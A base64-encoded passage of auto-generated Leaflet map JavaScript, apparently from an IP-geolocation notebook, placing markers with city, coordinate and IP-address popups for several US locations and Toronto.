aXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyX2NjYTkzZjkxN2QyNzQ0YTRhYTk4MzVmMDQyZjkxY2U4LnNldEljb24oaWNvbl84ZjczMWFjMzFmYzQ0MzI1OGJkODQ4YzExZjA3Njk2Yik7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfZmFjOTc0NmM2ODYwNDJhOTg0Zjg1MTFlODMzNDUzZDYgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzcyYTYxMWUwMDE1MDQwZDE4YWNjNDY1MjQ1Y2JkZjBmID0gJChgPGRpdiBpZD0iaHRtbF83MmE2MTFlMDAxNTA0MGQxOGFjYzQ2NTI0NWNiZGYwZiIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVRleGFzLCBDaXR5PVNhbiBBbnRvbmlvLCBMb25naXR1ZGU9LTk4LjQ5MzUsIExhdGl0dWRlPTI5LjQyNDcsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDQwLjEyNC40NS4xOTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF9mYWM5NzQ2YzY4NjA0MmE5ODRmODUxMWU4MzM0NTNkNi5zZXRDb250ZW50KGh0bWxfNzJhNjExZTAwMTUwNDBkMThhY2M0NjUyNDVjYmRmMGYpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfY2NhOTNmOTE3ZDI3NDRhNGFhOTgzNWYwNDJmOTFjZTguYmluZFBvcHVwKHBvcHVwX2ZhYzk3NDZjNjg2MDQyYTk4NGY4NTExZTgzMzQ1M2Q2KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfY2NhOTNmOTE3ZDI3NDRhNGFhOTgzNWYwNDJmOTFjZTguYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgU2FuIEFudG9uaW8sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMWIxMGIxNzY1OTNiNDQzNWJiYTM3Mzc4NGYxNWE5OGMgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs0MS42MDA2LCAtOTMuNjExMl0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fYzE2YTEwMzUxOTZiNGQ3NzgwYWM5NGMzODEyMDhiYzUgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzFiMTBiMTc2NTkzYjQ0MzViYmEzNzM3ODRmMTVhOThjLnNldEljb24oaWNvbl9jMTZhMTAzNTE5NmI0ZDc3ODBhYzk0YzM4MTIwOGJjNSk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfMDhlZjNiNTJlZDU4NDFhYzkxMjIyODlkZTFmZTg3MzMgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzg3M2EyYjMyMGI4NzRlMWViZmE0MDhiNDJjNDM0ZDZhID0gJChgPGRpdiBpZD0iaHRtbF84NzNhMmIzMjBiODc0ZTFlYmZhNDA4YjQyYzQzNGQ2YSIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxMDQuNDMuMjEyLjEyPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzA4ZWYzYjUyZWQ1ODQxYWM5MTIyMjg5ZGUxZmU4NzMzLnNldENvbnRlbnQoaHRtbF84NzNhMmIzMjBiODc0ZTFlYmZhNDA4YjQyYzQzNGQ2YSk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8xYjEwYjE3NjU5M2I0NDM1YmJhMzczNzg0ZjE1YTk4Yy5iaW5kUG9wdXAocG9wdXBfMDhlZjNiNTJlZDU4NDFhYzkxMjIyODlkZTFmZTg3MzMpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8xYjEwYjE3NjU5M2I0NDM1YmJhMzczNzg0ZjE1YTk4Yy5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBEZXMgTW9pbmVzLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzExODQ1YzkwZmI5MjQ0Y2Y5YTc4ZmVjZDJiYjgwN2FhID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbNDEuMTM5OSwgLTEwNC44MTkzXSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9iOTNlOGYxZjc2OWQ0MzgyYjAwNzEwMjIyZWIxMjNkZSA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfMTE4NDVjOTBmYjkyNDRjZjlhNzhmZWNkMmJiODA3YWEuc2V0SWNvbihpY29uX2I5M2U4ZjFmNzY5ZDQzODJiMDA3MTAyMjJlYjEyM2RlKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF9hOTdlOTA4NjNhZTI0ODVkODVlYjMwNTc5YTk1ZWQ5NSA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfMmVjM2E2MmM4NTc4NDhjZmExZmFmMDY3Nzk3MTQ3OWQgPSAkKGA8ZGl2IGlkPSJodG1sXzJlYzNhNjJjODU3ODQ4Y2ZhMWZhZjA2Nzc5NzE0NzlkIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9V3lvbWluZywgQ2l0eT1DaGV5ZW5uZSwgTG9uZ2l0dWRlPS0xMDQuODE5MywgTGF0aXR1ZGU9NDEuMTM5OSwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNDAuNzcuMjMyLjk1PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwX2E5N2U5MDg2M2FlMjQ4NWQ4NWViMzA1NzlhOTVlZDk1LnNldENvbnRlbnQoaHRtbF8yZWMzYTYyYzg1Nzg0OGNmYTFmYWYwNjc3OTcxNDc5ZCk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8xMTg0NWM5MGZiOTI0NGNmOWE3OGZlY2QyYmI4MDdhYS5iaW5kUG9wdXAocG9wdXBfYTk3ZTkwODYzYWUyNDg1ZDg1ZWIzMDU3OWE5NWVkOTUpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8xMTg0NWM5MGZiOTI0NGNmOWE3OGZlY2QyYmI4MDdhYS5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBDaGV5ZW5uZSwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl8yMTE1NWNjODE5NDc0ZTY4OWNiNjYyY2Q2ZjliYmM4ZiA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzM2LjY1MzQsIC03OC4zNzVdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzdhZjZiOWIwYjQzMDQ3NzBhZDQ4MTE5Njk3ZTZhYzgxID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8yMTE1NWNjODE5NDc0ZTY4OWNiNjYyY2Q2ZjliYmM4Zi5zZXRJY29uKGljb25fN2FmNmI5YjBiNDMwNDc3MGFkNDgxMTk2OTdlNmFjODEpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwX2VhOWQ1OWE0NTU0ZjRmNDU5YTljODE5YjFhMWMyOGY2ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF9iMjA2ZDc2OGQwNGU0MDQwOWFiZjJlNjU0YTZlMWY0NyA9ICQoYDxkaXYgaWQ9Imh0bWxfYjIwNmQ3NjhkMDRlNDA0MDlhYmYyZTY1NGE2ZTFmNDciIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1WaXJnaW5pYSwgQ2l0eT1Cb3lkdG9uLCBMb25naXR1ZGU9LTc4LjM3NSwgTGF0aXR1ZGU9MzYuNjUzNCwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNDAuNzcuMjI4LjY5PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwX2VhOWQ1OWE0NTU0ZjRmNDU5YTljODE5YjFhMWMyOGY2LnNldENvbnRlbnQoaHRtbF9iMjA2ZDc2OGQwNGU0MDQwOWFiZjJlNjU0YTZlMWY0Nyk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8yMTE1NWNjODE5NDc0ZTY4OWNiNjYyY2Q2ZjliYmM4Zi5iaW5kUG9wdXAocG9wdXBfZWE5ZDU5YTQ1NTRmNGY0NTlhOWM4MTliMWExYzI4ZjYpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8yMTE1NWNjODE5NDc0ZTY4OWNiNjYyY2Q2ZjliYmM4Zi5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBCb3lkdG9uLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzFhYzRhOTAyYzY5ZTQwNDM4MzMxNmEwZjI3MTg3ZGViID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbNDMuNjY0NCwgLTc5LjQxOTVdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzFiMzFlOTgxMTlkMDQ4MWJhMTNjOWYyZTRkNzFlMGVhID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8xYWM0YTkwMmM2OWU0MDQzODMzMTZhMGYyNzE4N2RlYi5zZXRJY29uKGljb25fMWIzMWU5ODExOWQwNDgxYmExM2M5ZjJlNGQ3MWUwZWEpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzg1YzBjZDI4OTMwMTRjODRiMjg2YTI2N2RlY2ZiZDE1ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF8xNWFjMjJhY2U2ZDI0ZTk4ODUwNTI5NWJkNTFhYzM3MiA9ICQoYDxkaXYgaWQ9Imh0bWxfMTVhYzIyYWNlNmQyNGU5ODg1MDUyOTViZDUxYWMzNzIiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPUNBLCBDb3VudHJ5TmFtZT1DYW5hZGEsIFN0YXRlPU9udGFyaW8sIENpdHk9VG9yb250bywgTG9uZ2l0dWRlPS03OS40MTk1LCBMYXRpdHVkZT00My42NjQ0LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiA0MC44NS4yMzIuNjQ8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfODVjMGNkMjg5MzAxNGM4NGIyODZhMjY3ZGVjZmJkMTUuc2V0Q29udGVudChodG1sXzE1YWMyMmFjZTZkMjRlOTg4NTA1Mjk1YmQ1MWFjMzcyKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzFhYzRhOTAyYzY5ZTQwNDM4MzMxNmEwZjI3MTg3ZGViLmJpbmRQb3B1cChwb3B1cF84NWMwY2QyODkzMDE0Yzg0YjI4NmEyNjdkZWNmYmQxNSkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzFhYzRhOTAyYzY5ZTQwNDM4MzMxNmEwZjI3MTg3ZGViLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFRvcm9udG8sIENhbmFkYQogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl9mYjExYTcyNjFmNGY0ZGE0YTgzNmMxNTJmYzIyYzI3NyA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzM4LjcwOTUsIC03OC4xNTM5XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl8wYTc2MjJmOGQxZmI0MWM1YjA4Njc3NzA4Yjg0OTQxMSA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfZmIxMWE3MjYxZjRmNGRhNGE4MzZjMTUyZmMyMmMyNzcuc2V0SWNvbihpY29uXzBhNzYyMmY4ZDFmYjQxYzViMDg2Nzc3MDhiODQ5NDExKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF9kZGVhODk3YjdkMjU0YzhkYWFjYTYzNDQ1ZmEzZjU5YiA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfOWRjOWM5OTNiMmVmNDg0M2IzODVlYjJlYWZjM2QxOTIgPSAkKGA8ZGl2IGlkPSJodG1sXzlkYzljOTkzYjJlZjQ4NDNiMzg1ZWIyZWFmYzNkMTkyIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9V2FzaGluZ3RvbiwgTG9uZ2l0dWRlPS03OC4xNTM5LCBMYXRpdHVkZT0zOC43MDk1LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAyMC4zOC45OC4xMDA8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfZGRlYTg5N2I3ZDI1NGM4ZGFhY2E2MzQ0NWZhM2Y1OWIuc2V0Q29udGVudChodG1sXzlkYzljOTkzYjJlZjQ4NDNiMzg1ZWIyZWFmYzNkMTkyKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyX2ZiMTFhNzI2MWY0ZjRkYTRhODM2YzE1MmZjMjJjMjc3LmJpbmRQb3B1cChwb3B1cF9kZGVhODk3YjdkMjU0YzhkYWFjYTYzNDQ1ZmEzZjU5YikKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyX2ZiMTFhNzI2MWY0ZjRkYTRhODM2YzE1MmZjMjJjMjc3LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFdhc2hpbmd0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMGY5NTNkM2RhNmJmNDRhNzg1YjA0OTQ3MGM0NWQ5ZDggPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFszOC43MDk1LCAtNzguMTUzOV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fM2M3OTM1YmE5ZTJjNDE1NGFiZjc5NzhiMWQwNjRmYmMgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzBmOTUzZDNkYTZiZjQ0YTc4NWIwNDk0NzBjNDVkOWQ4LnNldEljb24oaWNvbl8zYzc5MzViYTllMmM0MTU0YWJmNzk3OGIxZDA2NGZiYyk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfZTNiNGQ5MTNmZGU2NDkyYThhZGI4OTRiMjIzODc0OTMgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzdlOThlODFiM2QzZjRmODRhMjMwNDkxNjE4MTM5ZDUyID0gJChgPGRpdiBpZD0iaHRtbF83ZTk4ZTgxYjNkM2Y0Zjg0YTIzMDQ5MTYxODEzOWQ1MiIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVZpcmdpbmlhLCBDaXR5PVdhc2hpbmd0b24sIExvbmdpdHVkZT0tNzguMTUzOSwgTGF0aXR1ZGU9MzguNzA5NSwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogMjMuOTYuNjQuODQ8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfZTNiNGQ5MTNmZGU2NDkyYThhZGI4OTRiMjIzODc0OTMuc2V0Q29udGVudChodG1sXzdlOThlODFiM2QzZjRmODRhMjMwNDkxNjE4MTM5ZDUyKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzBmOTUzZDNkYTZiZjQ0YTc4NWIwNDk0NzBjNDVkOWQ4LmJpbmRQb3B1cChwb3B1cF9lM2I0ZDkxM2ZkZTY0OTJhOGFkYjg5NGIyMjM4NzQ5MykKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzBmOTUzZDNkYTZiZjQ0YTc4NWIwNDk0NzBjNDVkOWQ4LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFdhc2hpbmd0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFszNi42NTM0LCAtNzguMzc1XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9kMTZkODZiNDk4NDk0NjM2YjhjZmE5OTNlZDZjNjAwYiA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYuc2V0SWNvbihpY29uX2QxNmQ4NmI0OTg0OTQ2MzZiOGNmYTk5M2VkNmM2MDBiKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF82YTNmZGY5ZjZiNjk0MjliOWRlYjg4ODJjNmUyNzk2NyA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfY2FhMzUwY2FmMWIzNDg2MmFhMjNhNjkyOWU3YmQzNWQgPSAkKGA8ZGl2IGlkPSJodG1sX2NhYTM1MGNhZjFiMzQ4NjJhYTIzYTY5MjllN2JkMzVkIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9Qm95ZHRvbiwgTG9uZ2l0dWRlPS03OC4zNzUsIExhdGl0dWRlPTM2LjY1MzQsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDY1LjU1LjQ0LjEwODwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF82YTNmZGY5ZjZiNjk0MjliOWRlYjg4ODJjNmUyNzk2Ny5zZXRDb250ZW50KGh0bWxfY2FhMzUwY2FmMWIzNDg2MmFhMjNhNjkyOWU3YmQzNWQpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYuYmluZFBvcHVwKHBvcHVwXzZhM2ZkZjlmNmI2OTQyOWI5ZGViODg4MmM2ZTI3OTY3KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgQm95ZHRvbiwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl8zNTUwYjQ0N2RhOWI0YzE4OTdiMzRiZDk1YzEyYTA4YiA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQ3LjY3NDIsIC0xMjIuMTI0M10sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fYTZmY2VkZjdjMTdiNGExNGIyZDdkNDg2OTNhNjJlZDUgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzM1NTBiNDQ3ZGE5YjRjMTg5N2IzNGJkOTVjMTJhMDhiLnNldEljb24oaWNvbl9hNmZjZWRmN2MxN2I0YTE0YjJkN2Q0ODY5M2E2MmVkNSk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYWNlOGQxY2M2OTAyNGZkNDk0OWMxYzBhYjk3OGJjZTYgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2E3ZjkwOGIzZTJmNTQ2YTM4MzJkY2Q0Zjk3MDFmMGEwID0gJChgPGRpdiBpZD0iaHRtbF9hN2Y5MDhiM2UyZjU0NmEzODMyZGNkNGY5NzAxZjBhMCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVdhc2hpbmd0b24sIENpdHk9UmVkbW9uZCwgTG9uZ2l0dWRlPS0xMjIuMTI0MywgTGF0aXR1ZGU9NDcuNjc0MiwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogMTMxLjEwNy4xNDcuMjA5PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwX2FjZThkMWNjNjkwMjRmZDQ5NDljMWMwYWI5NzhiY2U2LnNldENvbnRlbnQoaHRtbF9hN2Y5MDhiM2UyZjU0NmEzODMyZGNkNGY5NzAxZjBhMCk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8zNTUwYjQ0N2RhOWI0YzE4OTdiMzRiZDk1YzEyYTA4Yi5iaW5kUG9wdXAocG9wdXBfYWNlOGQxY2M2OTAyNGZkNDk0OWMxYzBhYjk3OGJjZTYpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8zNTUwYjQ0N2RhOWI0YzE4OTdiMzRiZDk1YzEyYTA4Yi5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAg